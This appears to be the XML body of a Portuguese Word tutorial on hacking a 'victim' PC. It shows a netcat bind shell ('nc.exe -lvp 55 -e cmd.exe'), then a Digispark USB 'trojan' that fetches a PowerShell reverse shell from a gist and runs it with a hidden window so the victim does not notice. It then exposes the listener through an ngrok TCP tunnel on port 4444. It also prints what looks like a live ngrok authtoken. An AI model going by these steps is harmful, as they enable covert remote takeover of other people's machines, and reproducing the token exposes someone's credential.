          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31A3E8D9" wp14:editId="51B89BA2">
            <wp:extent cx="5400040" cy="29425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69D" w14:textId="7FD60AE3" w:rsidR="005B0523" w:rsidRDefault="005B0523">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na pimeira tentativa colocamos o IP da máquina (vitima) mas tem um problema essa porta não está disponível pra se conectar, por vamos abrir outro cmd e entrar na pasta do netcat e digitar </w:t>
      </w:r>
      <w:r w:rsidRPr="005B0523">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe -lvp 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5195F09B" w14:textId="2554698E" w:rsidR="005B0523" w:rsidRDefault="005B0523" w:rsidP="005B0523">
      <w:r>
        <w:t>-lvp (l: ovir, v:mostrar alguns dados, p: porta que ele quer ouvir) 55 é a porta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326221DC" w14:textId="5CF3D3B0" w:rsidR="000B334C" w:rsidRDefault="000B334C" w:rsidP="005B0523">
      <w:r>
        <w:t>5- Após da ENTER a porta estará liberada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B8D137" w14:textId="4EDDB086" w:rsidR="000B334C" w:rsidRDefault="000B334C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FB6E2B5" wp14:editId="06904E41">
            <wp:extent cx="5400040" cy="28454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18D" w14:textId="15265F45" w:rsidR="00172979" w:rsidRDefault="00172979">
      <w:r>
        <w:t xml:space="preserve">Como vamos conectar com o próprio computador vamos colocar o IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00172979">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> na porta </w:t>
      </w:r>
      <w:r w:rsidRPr="00172979">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6FF253" w14:textId="5FE9814B" w:rsidR="00172979" w:rsidRDefault="00172979">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024748FA" wp14:editId="310715D7">
            <wp:extent cx="5400040" cy="29813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069" w14:textId="49FF106C" w:rsidR="00F96E4D" w:rsidRDefault="00F96E4D">
      <w:r>
        <w:t>Após da ENTER o que eu digitar vai aparecer no outro CMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5925EA28" w14:textId="01E857C2" w:rsidR="00F96E4D" w:rsidRDefault="00F96E4D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="497B50C4" wp14:editId="614BE6A1">
            <wp:extent cx="5400040" cy="27419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21CB" w14:textId="48C44477" w:rsidR="00F96E4D" w:rsidRDefault="00F96E4D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="410F230F" wp14:editId="4685E110">
            <wp:extent cx="5400040" cy="24980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F49" w14:textId="12B226A7" w:rsidR="00610AC5" w:rsidRDefault="00610AC5">
      <w:r>
        <w:t xml:space="preserve">Agora faremos dois testes vamos copiar a pasta do Netcat e renomear as duas como </w:t>
      </w:r>
      <w:r w:rsidRPr="00610AC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alvo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidRPr="00610AC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vitima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> onde alvo seria o hacker e a vitima seria a vítima do ataque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA67209" w14:textId="57819EEC" w:rsidR="00610AC5" w:rsidRDefault="00610AC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CEF3C3B" wp14:editId="511AD994">
            <wp:extent cx="5400040" cy="5930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9DCD" w14:textId="2B4AAC9E" w:rsidR="00610AC5" w:rsidRPr="00B07F8D" w:rsidRDefault="00B07F8D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aqui na nossa </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07F8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vitima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vamos executar o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07F8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe -lvp 55-e “cmd.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371ABAE7" w14:textId="7A1008FE" w:rsidR="00B07F8D" w:rsidRDefault="00B07F8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29DD6A32" wp14:editId="5D92CF3D">
            <wp:extent cx="5400040" cy="27686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840" w14:textId="5720AF9A" w:rsidR="00CB2747" w:rsidRDefault="00CB2747">
      <w:r>
        <w:t xml:space="preserve">No alvo que é você , digitara o seguinte comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc.exe 127.0.0.1 55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>e depois ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFD964B" w14:textId="5926F4AC" w:rsidR="00CB2747" w:rsidRDefault="00CB2747">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="000B1AEF" wp14:editId="56ECE556">
            <wp:extent cx="5400040" cy="28136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61EC" w14:textId="3755006A" w:rsidR="00CB2747" w:rsidRDefault="00CB2747">
      <w:r>
        <w:t>Aqui eu posso digitar qualquer coisa como se fosse a vítima digitando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D675B5E" w14:textId="04F14792" w:rsidR="00CB2747" w:rsidRDefault="00CB2747">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EFC27C4" wp14:editId="08CBE104">
            <wp:extent cx="5400040" cy="277876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557A" w14:textId="2A3A784B" w:rsidR="00D359B7" w:rsidRDefault="00D359B7">
      <w:r>
        <w:t xml:space="preserve">Criar pastas </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025B0F6" w14:textId="2A3449DE" w:rsidR="00D359B7" w:rsidRDefault="00D359B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="493CB84F" wp14:editId="382623B3">
            <wp:extent cx="5400040" cy="2809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A33" w14:textId="7EC5CEE5" w:rsidR="00D359B7" w:rsidRDefault="00D359B7">
      <w:r w:rsidRPr="00D359B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>^C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pra sair da conexão</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F1185" w14:textId="7345F7EB" w:rsidR="00D359B7" w:rsidRDefault="00D359B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419198F2" wp14:editId="4BEA36D2">
            <wp:extent cx="5400040" cy="315468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635" w14:textId="220308D3" w:rsidR="00D359B7" w:rsidRDefault="00D359B7">
      <w:r>
        <w:t xml:space="preserve">Agora se você ver o PC da vitima você que tem uma pasta chamada </w:t>
      </w:r>
      <w:r w:rsidRPr="00D359B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hackeado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697650FB" w14:textId="58BFBCE5" w:rsidR="00D359B7" w:rsidRDefault="00D359B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F8F6C18" wp14:editId="2B996234">
            <wp:extent cx="5400040" cy="27641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88B7" w14:textId="3151020C" w:rsidR="00FC7709" w:rsidRDefault="00FC7709">
      <w:r>
        <w:t>Criando um trojam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DF8FD4" w14:textId="303387C5" w:rsidR="00FC7709" w:rsidRDefault="00FC7709">
      <w:r>
        <w:t xml:space="preserve">Primeiro na sua máquina entra no cmd e digita </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC7709">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pra ver seu ip em seguida cola no código abaixo, vamos conectar na porta </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC7709">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mesmo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB81738" w14:textId="71661F38" w:rsidR="00FC7709" w:rsidRDefault="00FC7709">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0808E278" wp14:editId="5919B016">
            <wp:extent cx="5400040" cy="31883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A36C" w14:textId="03C9B530" w:rsidR="00FC7709" w:rsidRDefault="00FC7709">
      <w:r>
        <w:t>Para formatar seleciona substituir conforme a figura abixo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C38A95C" w14:textId="198F311D" w:rsidR="00FC7709" w:rsidRDefault="00FC7709">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59867418" wp14:editId="27BD05AB">
            <wp:extent cx="5400040" cy="315468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DDA9" w14:textId="63AAF949" w:rsidR="00FC7709" w:rsidRDefault="00FC7709">
      <w:r>
        <w:t>Agora abre o Arduino e coloca o código</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A6293" w14:textId="54E10BC8" w:rsidR="00FC7709" w:rsidRPr="00FC7709" w:rsidRDefault="00FC7709">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="588DD83D" wp14:editId="27522798">
            <wp:extent cx="5400040" cy="149733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15D" w14:textId="68B2B0F9" w:rsidR="00FC7709" w:rsidRDefault="003A0ECE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Após isso abre o seu</w:t>
      </w:r>
      <w:r w:rsidR="00C60C2E">
        <w:t xml:space="preserve"> (você que é o hacker)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMD e tenta ouvir a porta </w:t>
      </w:r>
      <w:r w:rsidRPr="003A0ECE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266468A8" w14:textId="2A3C3C3D" w:rsidR="003A0ECE" w:rsidRDefault="003A0ECE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ECABE71" wp14:editId="6DA2B62F">
            <wp:extent cx="5400040" cy="422211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CCB2" w14:textId="1B0BF698" w:rsidR="00C60C2E" w:rsidRDefault="00C60C2E">
      <w:r>
        <w:t>Após plugar o Digisparck no pc da vitima você já terá uma conexão remota</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FFE49C" w14:textId="095ED2E6" w:rsidR="00C60C2E" w:rsidRDefault="00C60C2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FED29FA" wp14:editId="2A4A8F0E">
            <wp:extent cx="5400040" cy="1558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679F" w14:textId="05F43B6D" w:rsidR="00C60C2E" w:rsidRDefault="00C60C2E">
      <w:r>
        <w:t>Nesse caso não vai dar certo executar nenhum comando p</w:t>
      </w:r>
      <w:r w:rsidR="00DB3F5A">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>rque estou conectando na minha própria máquina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059888B6" w14:textId="47C165DD" w:rsidR="005175B2" w:rsidRDefault="005175B2"/>
    <w:p w14:paraId="0DF77FD5" w14:textId="77777777" w:rsidR="005175B2" w:rsidRDefault="005175B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B9C1858" w14:textId="77777777" w:rsidR="005175B2" w:rsidRDefault="005175B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1102191F" w14:textId="77777777" w:rsidR="005175B2" w:rsidRDefault="005175B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616DAE84" w14:textId="188A6B0B" w:rsidR="005175B2" w:rsidRDefault="005175B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005175B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Maneira segura de injetar o trojam no digispark sem que a vitima perceba pois o powershell ficaria aberto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113941FE" w14:textId="4366EA84" w:rsidR="005175B2" w:rsidRDefault="005175B2">
      <w:r>
        <w:t>Pra fazer isso vamos utilizar o mesmo código do Powershell usado anteriormente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3FA7C3" w14:textId="2DD9504A" w:rsidR="005175B2" w:rsidRDefault="005175B2">
      <w:r>
        <w:t>Esse arquivo precisa ter uma extensão .</w:t>
      </w:r>
      <w:r w:rsidRPr="005175B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>que é do Powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052880A9" w14:textId="3A113D4F" w:rsidR="005B522F" w:rsidRDefault="005B522F">
      <w:r>
        <w:t xml:space="preserve">Entra nesse site abaixo: </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidRPr="006110EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> e cola o código (não esquecer de colocar o seu IP), o mesmo pode ser visto em Meu IP no Google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA1163F" w14:textId="77777777" w:rsidR="005B522F" w:rsidRDefault="005B522F"/>
    <w:p w14:paraId="6491D357" w14:textId="71896B46" w:rsidR="005B522F" w:rsidRPr="005175B2" w:rsidRDefault="005B522F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FE55956" wp14:editId="07C168ED">
            <wp:extent cx="5400040" cy="27914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C00B" w14:textId="77777777" w:rsidR="003A0ECE" w:rsidRDefault="003A0ECE"/>
    <w:p w14:paraId="628EB1DB" w14:textId="5A247255" w:rsidR="00FC7709" w:rsidRDefault="00F71F13">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Após isso clique em </w:t>
      </w:r>
      <w:r w:rsidRPr="00F71F13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434319F8" w14:textId="0B7FCEB7" w:rsidR="00F71F13" w:rsidRDefault="00F71F13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72D65E66" wp14:editId="36483757">
            <wp:extent cx="5400040" cy="26003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E83F" w14:textId="466A5FD0" w:rsidR="00F71F13" w:rsidRDefault="00F71F13">
      <w:r>
        <w:t>Em seguida copia a URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA9BBB" w14:textId="006D00AA" w:rsidR="00F71F13" w:rsidRDefault="00F71F13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32D129A0" wp14:editId="1F370781">
            <wp:extent cx="5400040" cy="299593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285C" w14:textId="268F3D62" w:rsidR="0035464F" w:rsidRDefault="0035464F">
      <w:r>
        <w:t>Agora copia e cola nesse outro código para o powershell salvar o arquivo da web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60329A89" w14:textId="715A3B2D" w:rsidR="0035464F" w:rsidRDefault="0035464F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DD61266" wp14:editId="278D4343">
            <wp:extent cx="5400040" cy="288417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2562" w14:textId="034FB225" w:rsidR="0035464F" w:rsidRDefault="0035464F">
      <w:r>
        <w:t>Ficando assim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2371E34D" w14:textId="763A9AC7" w:rsidR="0035464F" w:rsidRDefault="0035464F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26C90F29" wp14:editId="2AD2D0FE">
            <wp:extent cx="5400040" cy="30505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CC83" w14:textId="6B3EEBA4" w:rsidR="0056248D" w:rsidRDefault="0056248D">
      <w:r>
        <w:t xml:space="preserve">Agora vamos utilizar o </w:t>
      </w:r>
      <w:r w:rsidRPr="0056248D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell -windowstyle hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>pra deixar oculto as janelas do Excel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2F2B4" w14:textId="4B47DA93" w:rsidR="0056248D" w:rsidRDefault="0056248D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2470F6D1" wp14:editId="698FC365">
            <wp:extent cx="5400040" cy="319214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DEC" w14:textId="325B501D" w:rsidR="0056248D" w:rsidRDefault="0056248D">
      <w:r>
        <w:t>Só não esquece de fazer isso aqui pra formatar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741D478B" w14:textId="5AA0EFCF" w:rsidR="0056248D" w:rsidRDefault="0056248D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51683B16" wp14:editId="0DD75645">
            <wp:extent cx="5400040" cy="319405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CE49" w14:textId="6CFAC82D" w:rsidR="00F62847" w:rsidRDefault="00F62847">
      <w:r>
        <w:t>Em seguida é só colocar o código mais uma vez no script do Arduino</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDE6A85" w14:textId="33CBB8EB" w:rsidR="00F62847" w:rsidRDefault="00F62847">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DCBCB14" wp14:editId="6224F2E0">
            <wp:extent cx="5400040" cy="2035175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E0C6" w14:textId="77777777" w:rsidR="00662B61" w:rsidRDefault="00662B61" w:rsidP="00662B61">
      <w:pPr>
        <w:pStyle w:val="Ttulo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121212"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Reverse Shell na pratica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2981E28B" w14:textId="2F08F60A" w:rsidR="00662B61" w:rsidRDefault="00662B61">
      <w:r>
        <w:t xml:space="preserve">Faz a mesma coisa que o </w:t>
      </w:r>
      <w:r w:rsidRPr="00662B61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00662B61">
        <w:t>abre o cmd e copia o caminho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D3EF8" w14:textId="05D3B5AD" w:rsidR="00662B61" w:rsidRDefault="00662B61">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7475FCDE" wp14:editId="13CB26EC">
            <wp:extent cx="5400040" cy="244602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1BC" w14:textId="1B74E987" w:rsidR="00662B61" w:rsidRDefault="00662B61">
      <w:r>
        <w:t xml:space="preserve">Se eu digitar o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00662B61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ngrock.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vai aparecer todos os comandos que eu posso usar nele</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEA31D0" w14:textId="238018FA" w:rsidR="00845419" w:rsidRDefault="00845419">
      <w:r>
        <w:t xml:space="preserve">Pelo termux pode seguir as instruções nesse site: </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidRPr="006110EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://hspcx.blogspot.com/2020/05/instalando-ngrok-no-termux-tutorial.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2ECAF1C3" w14:textId="77777777" w:rsidR="00845419" w:rsidRDefault="00845419"/>
    <w:p w14:paraId="571362FF" w14:textId="2217E16E" w:rsidR="00662B61" w:rsidRDefault="00662B61">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52AC5FB3" wp14:editId="1078CBAE">
            <wp:extent cx="5400040" cy="3133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F655" w14:textId="3D795FA2" w:rsidR="00B22A6C" w:rsidRDefault="00B22A6C">
      <w:r>
        <w:t>Primeiro preciso fazer login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7456A63C" w14:textId="72C65CF3" w:rsidR="00652E34" w:rsidRPr="00652E34" w:rsidRDefault="00652E34">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00652E34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ngrok.exe authtoken 24hfv8DMqho0doA6s8HV0QSXiFj_3DHCv9AubLjfDeBAfsK2q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E07C5" w14:textId="3EE8C3BF" w:rsidR="00B22A6C" w:rsidRDefault="00B22A6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DF12607" wp14:editId="30D1FC69">
            <wp:extent cx="5400040" cy="32004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5EC4" w14:textId="2AB1E1B2" w:rsidR="00652E34" w:rsidRDefault="00652E34">
      <w:r>
        <w:t>Em seguida iremos salvar o nosso comando de configuração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C3C77" w14:textId="3DF53B22" w:rsidR="00652E34" w:rsidRDefault="00652E34">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19AFB0A3" wp14:editId="4B6006E4">
            <wp:extent cx="5400040" cy="22193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D2F" w14:textId="1FC4E64A" w:rsidR="00652E34" w:rsidRDefault="00652E34">
      <w:r>
        <w:t xml:space="preserve">Agora vamos executar o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00652E34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ngrok.exe tcp 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00652E34">
        <w:t>e usar a porta que a gente quer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC370EF" w14:textId="3C5FFD12" w:rsidR="00554D58" w:rsidRDefault="00554D58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B891588" wp14:editId="64D066B3">
            <wp:extent cx="5400040" cy="2870200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6D7" w14:textId="77B34643" w:rsidR="003F14E8" w:rsidRDefault="003F14E8">
      <w:r>
        <w:t xml:space="preserve">Vamos pegar o site e a porta pra colocar no Script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339B6A28" w14:textId="6B686EEA" w:rsidR="003F14E8" w:rsidRDefault="003F14E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6383A33E" wp14:editId="2B18A46B">
            <wp:extent cx="5400040" cy="286448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33E" w14:textId="4A2EEAD5" w:rsidR="003F14E8" w:rsidRDefault="003F14E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64F57F1A" wp14:editId="0014F4BF">
            <wp:extent cx="5400040" cy="191452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FA7" w14:textId="307660BE" w:rsidR="003566D2" w:rsidRDefault="003566D2">
      <w:r>
        <w:t>Após o script é só plugar o pendrive sem mexer no código e depois a magica acontece</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486A18CA" w14:textId="6A972BBA" w:rsidR="003566D2" w:rsidRDefault="003566D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50269F15" wp14:editId="6C77104F">
            <wp:extent cx="5400040" cy="2527935"/>
            <wp:effectExtent l="0" t="0" r="0" b="57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7FF9" w14:textId="05FA9F3D" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="7ABBA1C0" w14:textId="0B39449B" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
